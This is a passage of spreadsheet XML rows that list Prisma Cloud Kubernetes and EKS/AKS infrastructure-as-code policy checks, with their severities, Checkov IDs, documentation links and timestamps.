https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-2</t>
        </is>
      </c>
      <c r="Y1135" t="inlineStr"/>
      <c r="Z1135" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["PodSecurityPolicy"]}</t>
        </is>
      </c>
      <c r="AA1135" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1135" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1135" t="inlineStr">
        <is>
          <t>CKV_K8S_2</t>
        </is>
      </c>
      <c r="AD1135" t="b">
        <v>1</v>
      </c>
      <c r="AE1135" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1135" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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5" t="inlineStr">
        <is>
          <t>73ac1af4-0db3-4ad8-bdaa-4ce32d06b8d3</t>
        </is>
      </c>
      <c r="AI1135" t="inlineStr"/>
      <c r="AJ1135" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1135" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1136">
      <c r="A1136" t="inlineStr"/>
      <c r="B1136" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1136" s="2" t="inlineStr"/>
      <c r="D1136" t="inlineStr"/>
      <c r="E1136" t="inlineStr"/>
      <c r="F1136" t="inlineStr"/>
      <c r="G1136" t="b">
        <v>1</v>
      </c>
      <c r="H11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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1136" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:PodSecurityPolicy</t>
        </is>
      </c>
      <c r="K1136" t="inlineStr">
        <is>
          <t>Root containers admitted</t>
        </is>
      </c>
      <c r="L1136" t="inlineStr"/>
      <c r="M1136" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1136" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1136" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1136" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1136" t="inlineStr"/>
      <c r="R1136" t="inlineStr"/>
      <c r="S1136" t="inlineStr"/>
      <c r="T1136" t="b">
        <v>0</v>
      </c>
      <c r="U1136" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1136" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:PodSecurityPolicy</t>
        </is>
      </c>
      <c r="W1136" t="inlineStr">
        <is>
          <t>Do not admit root containers</t>
        </is>
      </c>
      <c r="X1136" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-5</t>
        </is>
      </c>
      <c r="Y1136" t="inlineStr"/>
      <c r="Z1136" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["PodSecurityPolicy"]}</t>
        </is>
      </c>
      <c r="AA1136" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1136" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1136" t="inlineStr">
        <is>
          <t>CKV_K8S_6</t>
        </is>
      </c>
      <c r="AD1136" t="b">
        <v>1</v>
      </c>
      <c r="AE1136" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1136" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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6" t="inlineStr">
        <is>
          <t>b7323f51-842c-4c36-8e16-d0ef3d6c3be4</t>
        </is>
      </c>
      <c r="AI1136" t="inlineStr"/>
      <c r="AJ1136" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1136" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1137">
      <c r="A1137" t="inlineStr"/>
      <c r="B1137" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1137" s="2" t="inlineStr"/>
      <c r="D1137" t="inlineStr"/>
      <c r="E1137" t="inlineStr"/>
      <c r="F1137" t="inlineStr"/>
      <c r="G1137" t="b">
        <v>1</v>
      </c>
      <c r="H11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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1137" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:PodSecurityPolicy</t>
        </is>
      </c>
      <c r="K1137" t="inlineStr">
        <is>
          <t>Containers wishing to share host process ID namespace admitted</t>
        </is>
      </c>
      <c r="L1137" t="inlineStr"/>
      <c r="M1137" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1137" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1137" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1137" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1137" t="inlineStr"/>
      <c r="R1137" t="inlineStr"/>
      <c r="S1137" t="inlineStr"/>
      <c r="T1137" t="b">
        <v>0</v>
      </c>
      <c r="U1137" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1137" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:PodSecurityPolicy</t>
        </is>
      </c>
      <c r="W1137" t="inlineStr">
        <is>
          <t>Do not admit containers wishing to share the host process ID namespace</t>
        </is>
      </c>
      <c r="X1137" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-1</t>
        </is>
      </c>
      <c r="Y1137" t="inlineStr"/>
      <c r="Z1137" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["PodSecurityPolicy"]}</t>
        </is>
      </c>
      <c r="AA1137" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1137" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1137" t="inlineStr">
        <is>
          <t>CKV_K8S_1</t>
        </is>
      </c>
      <c r="AD1137" t="b">
        <v>1</v>
      </c>
      <c r="AE1137" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1137" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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7" t="inlineStr">
        <is>
          <t>53a5a44c-050a-432c-a0fb-ea655acf14a8</t>
        </is>
      </c>
      <c r="AI1137" t="inlineStr"/>
      <c r="AJ1137" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1137" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1138">
      <c r="A1138" t="inlineStr"/>
      <c r="B1138" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1138" s="2" t="inlineStr"/>
      <c r="D1138" t="inlineStr"/>
      <c r="E1138" t="inlineStr"/>
      <c r="F1138" t="inlineStr"/>
      <c r="G1138" t="b">
        <v>1</v>
      </c>
      <c r="H11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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1138" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Role,ClusterRole</t>
        </is>
      </c>
      <c r="K1138" t="inlineStr">
        <is>
          <t>Wildcard use is not minimized in Roles and ClusterRoles</t>
        </is>
      </c>
      <c r="L1138" t="inlineStr"/>
      <c r="M1138" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1138" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1138" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1138" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1138" t="inlineStr"/>
      <c r="R1138" t="inlineStr"/>
      <c r="S1138" t="inlineStr"/>
      <c r="T1138" t="b">
        <v>0</v>
      </c>
      <c r="U1138" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1138" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Role,ClusterRole</t>
        </is>
      </c>
      <c r="W1138" t="inlineStr">
        <is>
          <t>Minimize wildcard use in Roles and ClusterRoles</t>
        </is>
      </c>
      <c r="X1138" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-minimized-wildcard-use-in-roles-and-clusterroles</t>
        </is>
      </c>
      <c r="Y1138" t="inlineStr"/>
      <c r="Z1138" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["Role","ClusterRole"]}</t>
        </is>
      </c>
      <c r="AA1138" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1138" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1138" t="inlineStr">
        <is>
          <t>CKV_K8S_49</t>
        </is>
      </c>
      <c r="AD1138" t="b">
        <v>1</v>
      </c>
      <c r="AE1138" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1138" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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8" t="inlineStr">
        <is>
          <t>1abd7f34-5d4d-4542-bb95-414857c82c3e</t>
        </is>
      </c>
      <c r="AI1138" t="inlineStr"/>
      <c r="AJ1138" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1138" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1139">
      <c r="A1139" t="inlineStr"/>
      <c r="B1139" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1139" s="2" t="inlineStr"/>
      <c r="D1139" t="inlineStr"/>
      <c r="E1139" t="inlineStr"/>
      <c r="F1139" t="inlineStr"/>
      <c r="G1139" t="b">
        <v>1</v>
      </c>
      <c r="H11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39" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1139" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:RoleBinding,ClusterRoleBinding</t>
        </is>
      </c>
      <c r="K1139" t="inlineStr">
        <is>
          <t>Default Kubernetes service accounts are actively used by bounding to a role or cluster role</t>
        </is>
      </c>
      <c r="L1139" t="inlineStr"/>
      <c r="M1139" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1139" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1139" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1139" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1139" t="inlineStr"/>
      <c r="R1139" t="inlineStr"/>
      <c r="S1139" t="inlineStr"/>
      <c r="T1139" t="b">
        <v>0</v>
      </c>
      <c r="U1139" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1139" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:RoleBinding,ClusterRoleBinding</t>
        </is>
      </c>
      <c r="W1139" t="inlineStr">
        <is>
          <t>Ensure that default service accounts are not actively used</t>
        </is>
      </c>
      <c r="X1139" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-default-service-accounts-are-not-actively-used</t>
        </is>
      </c>
      <c r="Y1139" t="inlineStr"/>
      <c r="Z1139" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["RoleBinding","ClusterRoleBinding"]}</t>
        </is>
      </c>
      <c r="AA1139" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1139" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1139" t="inlineStr">
        <is>
          <t>CKV_K8S_42</t>
        </is>
      </c>
      <c r="AD1139" t="b">
        <v>1</v>
      </c>
      <c r="AE1139" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1139" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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39" t="inlineStr">
        <is>
          <t>58cc757b-ff58-4c84-8c47-29651b27176f</t>
        </is>
      </c>
      <c r="AI1139" t="inlineStr"/>
      <c r="AJ1139" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1139" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1140">
      <c r="A1140" t="inlineStr"/>
      <c r="B1140" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1140" s="2" t="inlineStr"/>
      <c r="D1140" t="inlineStr"/>
      <c r="E1140" t="inlineStr"/>
      <c r="F1140" t="inlineStr"/>
      <c r="G1140" t="b">
        <v>1</v>
      </c>
      <c r="H11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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1140" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Service</t>
        </is>
      </c>
      <c r="K1140" t="inlineStr">
        <is>
          <t>Tiller (Helm v2) service is not deleted</t>
        </is>
      </c>
      <c r="L1140" t="inlineStr"/>
      <c r="M1140" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1140" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1140" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1140" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1140" t="inlineStr"/>
      <c r="R1140" t="inlineStr"/>
      <c r="S1140" t="inlineStr"/>
      <c r="T1140" t="b">
        <v>0</v>
      </c>
      <c r="U1140" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1140" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Service</t>
        </is>
      </c>
      <c r="W1140" t="inlineStr">
        <is>
          <t>Ensure that the Tiller Service (Helm v2) is deleted</t>
        </is>
      </c>
      <c r="X1140" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-41</t>
        </is>
      </c>
      <c r="Y1140" t="inlineStr"/>
      <c r="Z1140" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["Service"]}</t>
        </is>
      </c>
      <c r="AA1140" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1140" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1140" t="inlineStr">
        <is>
          <t>CKV_K8S_44</t>
        </is>
      </c>
      <c r="AD1140" t="b">
        <v>1</v>
      </c>
      <c r="AE1140" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1140" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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0" t="inlineStr">
        <is>
          <t>110b3674-1362-4d59-a721-5233965bb73d</t>
        </is>
      </c>
      <c r="AI1140" t="inlineStr"/>
      <c r="AJ1140" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1140" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1141">
      <c r="A1141" t="inlineStr">
        <is>
          <t>test-tushir-dell</t>
        </is>
      </c>
      <c r="B1141" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1141" s="2" t="inlineStr"/>
      <c r="D1141" t="inlineStr"/>
      <c r="E1141" t="inlineStr"/>
      <c r="F1141" t="inlineStr"/>
      <c r="G1141" t="b">
        <v>1</v>
      </c>
      <c r="H11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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1141" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Service,Pod,Deployment,DaemonSet,StatefulSet,ReplicaSet,ReplicationController,Job,CronJob,ServiceAccount,Secret,Role,RoleBinding,ConfigMap,Ingress</t>
        </is>
      </c>
      <c r="K1141" t="inlineStr">
        <is>
          <t>Default namespace is used</t>
        </is>
      </c>
      <c r="L1141" t="inlineStr"/>
      <c r="M1141" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1141" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1141" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1141" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1141" t="inlineStr">
        <is>
          <t>101</t>
        </is>
      </c>
      <c r="R1141" t="inlineStr">
        <is>
          <t>123</t>
        </is>
      </c>
      <c r="S1141" t="inlineStr"/>
      <c r="T1141" t="b">
        <v>0</v>
      </c>
      <c r="U1141" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1141" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Service,Pod,Deployment,DaemonSet,StatefulSet,ReplicaSet,ReplicationController,Job,CronJob,ServiceAccount,Secret,Role,RoleBinding,ConfigMap,Ingress</t>
        </is>
      </c>
      <c r="W1141" t="inlineStr">
        <is>
          <t>The default namespace should not be used</t>
        </is>
      </c>
      <c r="X1141" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-20</t>
        </is>
      </c>
      <c r="Y1141" t="inlineStr"/>
      <c r="Z1141" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["Service","Pod","Deployment","DaemonSet","StatefulSet","ReplicaSet","ReplicationController","Job","CronJob","ServiceAccount","Secret","Role","RoleBinding","ConfigMap","Ingress"]}</t>
        </is>
      </c>
      <c r="AA1141" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1141" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1141" t="inlineStr">
        <is>
          <t>CKV_K8S_21</t>
        </is>
      </c>
      <c r="AD1141" t="b">
        <v>1</v>
      </c>
      <c r="AE1141" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1141" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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1" t="inlineStr">
        <is>
          <t>6e7d5188-5797-407a-a993-d98b58c59203</t>
        </is>
      </c>
      <c r="AI1141" t="inlineStr"/>
      <c r="AJ1141" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1141" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1142">
      <c r="A1142" t="inlineStr"/>
      <c r="B1142" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1142" s="2" t="inlineStr"/>
      <c r="D1142" t="inlineStr"/>
      <c r="E1142" t="inlineStr"/>
      <c r="F1142" t="inlineStr"/>
      <c r="G1142" t="b">
        <v>1</v>
      </c>
      <c r="H11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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1142" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:ServiceAccount</t>
        </is>
      </c>
      <c r="K1142" t="inlineStr">
        <is>
          <t>Default service accounts are actively used</t>
        </is>
      </c>
      <c r="L1142" t="inlineStr"/>
      <c r="M1142" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1142" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1142" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1142" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1142" t="inlineStr"/>
      <c r="R1142" t="inlineStr"/>
      <c r="S1142" t="inlineStr">
        <is>
          <t>Identity Misconfiguration,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1142" t="b">
        <v>0</v>
      </c>
      <c r="U1142" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1142" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:ServiceAccount</t>
        </is>
      </c>
      <c r="W1142" t="inlineStr">
        <is>
          <t>Ensure that default service accounts are not actively used</t>
        </is>
      </c>
      <c r="X1142" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-38</t>
        </is>
      </c>
      <c r="Y1142" t="inlineStr"/>
      <c r="Z1142" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["ServiceAccount"]}</t>
        </is>
      </c>
      <c r="AA1142" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1142" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1142" t="inlineStr">
        <is>
          <t>CKV_K8S_41</t>
        </is>
      </c>
      <c r="AD1142" t="b">
        <v>1</v>
      </c>
      <c r="AE1142" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1142" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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2" t="inlineStr">
        <is>
          <t>51515bb4-26e1-4860-8f9e-a31e76f25740</t>
        </is>
      </c>
      <c r="AI1142" t="inlineStr"/>
      <c r="AJ1142" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1142" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1143">
      <c r="A1143" t="inlineStr"/>
      <c r="B1143" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1143" s="2" t="inlineStr"/>
      <c r="D1143" t="inlineStr"/>
      <c r="E1143" t="inlineStr"/>
      <c r="F1143" t="inlineStr"/>
      <c r="G1143" t="b">
        <v>1</v>
      </c>
      <c r="H11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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1143" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:aws-eks</t>
        </is>
      </c>
      <c r="K1143" t="inlineStr">
        <is>
          <t>EKS clusters are not running on a supported Kubernetes version</t>
        </is>
      </c>
      <c r="L1143" t="inlineStr"/>
      <c r="M1143" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1143" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1143" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1143" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1143" t="inlineStr"/>
      <c r="R1143" t="inlineStr"/>
      <c r="S1143" t="inlineStr"/>
      <c r="T1143" t="b">
        <v>0</v>
      </c>
      <c r="U1143" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1143" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:aws-eks-cluster</t>
        </is>
      </c>
      <c r="W1143" t="inlineStr">
        <is>
          <t>Ensure EKS clusters run on a supported Kubernetes version</t>
        </is>
      </c>
      <c r="X1143" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-kubernetes-policies/bc-aws-339</t>
        </is>
      </c>
      <c r="Y1143" t="inlineStr"/>
      <c r="Z1143" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["aws_eks_cluster"]}</t>
        </is>
      </c>
      <c r="AA1143" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1143" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1143" t="inlineStr">
        <is>
          <t>CKV_AWS_339</t>
        </is>
      </c>
      <c r="AD1143" t="b">
        <v>1</v>
      </c>
      <c r="AE1143" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1143" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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3" t="inlineStr">
        <is>
          <t>337a8feb-f114-451c-b388-80c60761fdc8</t>
        </is>
      </c>
      <c r="AI1143" t="inlineStr"/>
      <c r="AJ1143" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1143" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1144">
      <c r="A1144" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B1144" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1144" s="2" t="inlineStr"/>
      <c r="D1144" t="inlineStr"/>
      <c r="E1144" t="inlineStr"/>
      <c r="F1144" t="inlineStr"/>
      <c r="G1144" t="b">
        <v>1</v>
      </c>
      <c r="H11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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1144" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:aws-eks</t>
        </is>
      </c>
      <c r="K1144" t="inlineStr">
        <is>
          <t>AWS EKS node group have implicit SSH access from 0.0.0.0/0</t>
        </is>
      </c>
      <c r="L1144" t="inlineStr"/>
      <c r="M1144" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1144" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1144" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1144" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1144" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R1144" t="inlineStr">
        <is>
          <t>5.1.1 Config - Other</t>
        </is>
      </c>
      <c r="S1144" t="inlineStr"/>
      <c r="T1144" t="b">
        <v>0</v>
      </c>
      <c r="U1144" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1144" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:aws-eks-node-group</t>
        </is>
      </c>
      <c r="W1144" t="inlineStr">
        <is>
          <t>Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0</t>
        </is>
      </c>
      <c r="X1144" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-kubernetes-policies/bc-aws-kubernetes-5</t>
        </is>
      </c>
      <c r="Y1144" t="inlineStr"/>
      <c r="Z1144" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["aws_eks_node_group"]}</t>
        </is>
      </c>
      <c r="AA1144" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1144" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1144" t="inlineStr">
        <is>
          <t>CKV_AWS_100</t>
        </is>
      </c>
      <c r="AD1144" t="b">
        <v>1</v>
      </c>
      <c r="AE1144" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1144" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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4" t="inlineStr">
        <is>
          <t>c8c3807c-61d2-4b84-a45b-ecc6cadcf4fa</t>
        </is>
      </c>
      <c r="AI1144" t="inlineStr"/>
      <c r="AJ1144" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1144" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1145">
      <c r="A1145" t="inlineStr"/>
      <c r="B1145" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1145" s="2" t="inlineStr"/>
      <c r="D1145" t="inlineStr"/>
      <c r="E1145" t="inlineStr"/>
      <c r="F1145" t="inlineStr"/>
      <c r="G1145" t="b">
        <v>1</v>
      </c>
      <c r="H11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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1145" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:azure-kubernetes</t>
        </is>
      </c>
      <c r="K1145" t="inlineStr">
        <is>
          <t>Non-Critical System Pods Run on System Nodes</t>
        </is>
      </c>
      <c r="L1145" t="inlineStr"/>
      <c r="M1145" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1145" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1145" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1145" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1145" t="inlineStr"/>
